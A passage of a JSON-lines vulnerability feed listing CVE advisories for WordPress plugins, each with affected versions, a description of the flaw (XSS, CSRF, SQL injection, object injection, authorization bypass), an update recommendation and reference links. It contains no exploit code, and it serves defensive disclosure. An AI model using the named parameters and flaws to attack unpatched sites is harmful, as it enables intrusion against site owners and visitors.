{"CVE_ID":"CVE-2024-13432","slug":"webcamconsult","versionImpact":"1.5.0","versionEndExcluding":"1.6.0","description":"The Webcamconsult plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223211%40webcamconsult&new=3223211%40webcamconsult&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223211%40webcamconsult&new=3223211%40webcamconsult&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cdad887-dafa-4cf8-ac78-87b9b9b989e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cdad887-dafa-4cf8-ac78-87b9b9b989e2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13675","slug":"slingblocks","versionImpact":"1.5.0","versionEndExcluding":"1.6.0","description":"The SlingBlocks \u2013 Gutenberg Blocks by FunnelKit (Formerly WooFunnels) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \"Icon List\" Block in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251693%40slingblocks&new=3251693%40slingblocks&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251693%40slingblocks&new=3251693%40slingblocks&sfp_email=&sfph_mail=#file5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f34904b5-3b3d-46d3-9e33-ef661d5f4149?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f34904b5-3b3d-46d3-9e33-ef661d5f4149?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2841","slug":"advanced-local-pickup-for-woocommerce","versionEndExcluding":"1.6.0","description":"The Advanced Local Pickup for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the id parameter in versions up to, and including, 1.5.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with admin-level privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/125e7ea3-574a-4760-b10b-7a98d94c87a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/125e7ea3-574a-4760-b10b-7a98d94c87a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-local-pickup-for-woocommerce\\\/trunk\\\/include\\\/wc-local-pickup-admin.php?rev=2889033#L447\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-local-pickup-for-woocommerce\\\/trunk\\\/include\\\/wc-local-pickup-admin.php?rev=2889033#L447\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2986002%40advanced-local-pickup-for-woocommerce%2Ftrunk&old=2983681%40advanced-local-pickup-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2986002%40advanced-local-pickup-for-woocommerce%2Ftrunk&old=2983681%40advanced-local-pickup-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5137","slug":"simply-excerpts","versionImpact":"1.4","versionEndExcluding":"1.6","description":"The Simply Excerpts WordPress plugin through 1.4 does not sanitize and escape some fields in the plugin settings, which could allow high-privilege users such as an administrator to inject arbitrary web scripts even when the unfiltered_html capability is disallowed (for example in a multisite setup).","recommendation":"Update to version 1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79b79e9c-ea4f-4188-a1b5-61dda0b5d434\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79b79e9c-ea4f-4188-a1b5-61dda0b5d434\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36838","slug":"facebook-messenger-customer-chat","versionEndExcluding":"1.6","description":"The Facebook Chat Plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the wp_ajax_update_options function in versions up to, and including, 1.5. This flaw makes it possible for low-level authenticated attackers to connect their own Facebook Messenger account to any site running the vulnerable plugin and engage in chats with site visitors on affected sites.","recommendation":"Update to version 1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36ae4183-5fa7-484c-b858-5df10ae3d3f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36ae4183-5fa7-484c-b858-5df10ae3d3f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/08\\\/the-official-facebook-chat-plugin-created-vector-for-social-engineering-attacks\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/08\\\/the-official-facebook-chat-plugin-created-vector-for-social-engineering-attacks\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12441","slug":"bp-email-assign-templates","versionImpact":"1.5","versionEndExcluding":"1.6","description":"The BP Email Assign Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-email-assign-templates\\\/trunk\\\/pp-email-templates-admin.php#L297\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-email-assign-templates\\\/trunk\\\/pp-email-templates-admin.php#L297\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da81eb8b-4b38-462d-a85b-c0bad39f61a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da81eb8b-4b38-462d-a85b-c0bad39f61a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10621","slug":"simple-google-maps-short-code","versionImpact":"1.5.4","versionEndExcluding":"1.6","description":"The Simple Shortcode for Google Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's pw_map shortcode in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33146b95-d2c7-433d-a104-5762b251f8ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33146b95-d2c7-433d-a104-5762b251f8ec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3181804%40simple-google-maps-short-code%2Ftrunk&old=3065630%40simple-google-maps-short-code%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3181804%40simple-google-maps-short-code%2Ftrunk&old=3065630%40simple-google-maps-short-code%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11419","slug":"password-for-wp","versionImpact":"1.5","versionEndExcluding":"1.6","description":"The Password for WP plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on the get3_init_admin_page() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/password-for-wp\\\/trunk\\\/get3-password-wp.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/password-for-wp\\\/trunk\\\/get3-password-wp.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a5eb090-2dfb-4b30-bfc6-38061b94b87a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a5eb090-2dfb-4b30-bfc6-38061b94b87a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9237","slug":"fish-and-ships","versionImpact":"1.5.9","versionEndExcluding":"1.6","description":"The Fish and Ships \u2013 Most flexible shipping table rate. A WooCommerce shipping rate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.5.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceaf64d6-9872-4572-807e-7fce76edee57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceaf64d6-9872-4572-807e-7fce76edee57?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fish-and-ships\\\/tags\\\/1.5.9\\\/includes\\\/wizard.php#L226\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fish-and-ships\\\/tags\\\/1.5.9\\\/includes\\\/wizard.php#L226\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fish-and-ships\\\/tags\\\/1.5.9\\\/includes\\\/wizard.php#L479\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fish-and-ships\\\/tags\\\/1.5.9\\\/includes\\\/wizard.php#L479\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fish-and-ships\\\/tags\\\/1.5.9\\\/includes\\\/wizard.php#L369\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fish-and-ships\\\/tags\\\/1.5.9\\\/includes\\\/wizard.php#L369\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161229%40fish-and-ships&new=3161229%40fish-and-ships&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161229%40fish-and-ships&new=3161229%40fish-and-ships&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0423","slug":"wp-s3","versionEndExcluding":"1.6","description":"The WordPress Amazon S3 Plugin WordPress plugin before 1.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73d588d7-26ae-42e2-8282-aa02bcb109b6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73d588d7-26ae-42e2-8282-aa02bcb109b6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4403","slug":"remove-schema","versionImpact":"1.5","versionEndExcluding":"1.6","description":"The Remove Schema plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the validate() function. This makes it possible for unauthenticated attackers to modify the plugins settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89635463-966d-4f7d-995d-ad83a502d95b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89635463-966d-4f7d-995d-ad83a502d95b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548575%40remove-schema&new=2548575%40remove-schema&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548575%40remove-schema&new=2548575%40remove-schema&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1723","slug":"so-widgets-bundle","versionImpact":"1.58.7","versionEndExcluding":"1.58.8","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 1.58.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Affected parameters include: $instance['fonts']['title_options']['tag'], $headline_tag, $sub_headline_tag, $feature['icon'].","recommendation":"Update to version 1.58.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e63c566d-744b-42f5-9ba6-9007cc60313a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e63c566d-744b-42f5-9ba6-9007cc60313a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.58.6\\\/widgets\\\/features\\\/tpl\\\/default.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.58.6\\\/widgets\\\/features\\\/tpl\\\/default.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3044174%40so-widgets-bundle%2Ftrunk&old=3040814%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3044174%40so-widgets-bundle%2Ftrunk&old=3040814%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0961","slug":"so-widgets-bundle","versionImpact":"1.58.1","versionEndExcluding":"1.58.2","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the code editor in all versions up to, and including, 1.58.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.58.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/trunk\\\/widgets\\\/button\\\/button.php#L355\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/trunk\\\/widgets\\\/button\\\/button.php#L355\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36707","slug":"nifty-coming-soon-and-under-construction-page","versionEndExcluding":"1.58","description":"The Coming Soon & Maintenance Mode Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.57. This is due to confusing logic functions missing or having incorrect nonce validation. This makes it possible for unauthenticated attackers to gain and perform otherwise unauthorized access and actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/jetpack.com\\\/features\\\/security\\\/library\\\/nifty-coming-soon-and-under-construction-page-plugin\\\/\",\"name\":\"https:\\\/\\\/jetpack.com\\\/features\\\/security\\\/library\\\/nifty-coming-soon-and-under-construction-page-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59278214-b0ce-44bf-8d8f-265c5c50006a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59278214-b0ce-44bf-8d8f-265c5c50006a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-coming-soon-maintenance-mode-page-cross-site-request-forgery-1-57\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-coming-soon-maintenance-mode-page-cross-site-request-forgery-1-57\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa47a464-af97-43bc-b6cb-75a08ce3ece7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa47a464-af97-43bc-b6cb-75a08ce3ece7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36752","slug":"nifty-coming-soon-and-under-construction-page","versionImpact":"1.57","versionEndExcluding":"1.58","description":"The Coming Soon & Maintenance Mode Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.57. This is due to missing or incorrect nonce validation on the save_meta_box() function. This makes it possible for unauthenticated attackers to save meta boxes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.58, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368978%40nifty-coming-soon-and-under-construction-page&new=2368978%40nifty-coming-soon-and-under-construction-page&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368978%40nifty-coming-soon-and-under-construction-page&new=2368978%40nifty-coming-soon-and-under-construction-page&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d283527a-a955-4f82-9827-81a71158d8e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d283527a-a955-4f82-9827-81a71158d8e2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13463","slug":"seatreg","versionImpact":"1.56.0","versionEndExcluding":"1.56.1","description":"The SeatReg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'seatreg' shortcode in all versions up to, and including, 1.56.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.56.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227873%40seatreg&new=3227873%40seatreg&sfp_email=&sfph_mail=#file1224\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227873%40seatreg&new=3227873%40seatreg&sfp_email=&sfph_mail=#file1224\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/769bc1fa-4f41-431e-9907-6e03d2c921be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/769bc1fa-4f41-431e-9907-6e03d2c921be?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2290","slug":"advanced-ads","versionImpact":"1.52.1","versionEndExcluding":"1.52.2","description":"The Advanced Ads plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.52.1 via deserialization of untrusted input in the 'placement_slug' parameter. This makes it possible for authenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.52.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081914%40advanced-ads&new=3081914%40advanced-ads&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081914%40advanced-ads&new=3081914%40advanced-ads&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ads\\\/trunk\\\/modules\\\/import-export\\\/classes\\\/import.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ads\\\/trunk\\\/modules\\\/import-export\\\/classes\\\/import.php#L155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f64336f7-ab2a-4e22-a76f-d077c51f9c57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f64336f7-ab2a-4e22-a76f-d077c51f9c57?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3952","slug":"advanced-ads","versionImpact":"1.52.1","versionEndExcluding":"1.52.2","description":"The Advanced Ads \u2013\u00a0Ad Manager & AdSense plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Advanced Ad widget in all versions up to, and including, 1.52.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.52.2, or a newer patched 